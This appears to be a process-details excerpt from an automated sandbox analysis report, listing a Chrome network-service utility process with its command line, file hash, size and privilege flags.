                                                                                                                                                                                                                            Start date:13/05/2022
                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,13595751543582823336,10064474918634625774,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8
                                                                                                                                                                                                                            Imagebase:0x7ff6220c0000
                                                                                                                                                                                                                            File size:2150896 bytes
                                                                                                                                                                                                                            MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                                            No disassembly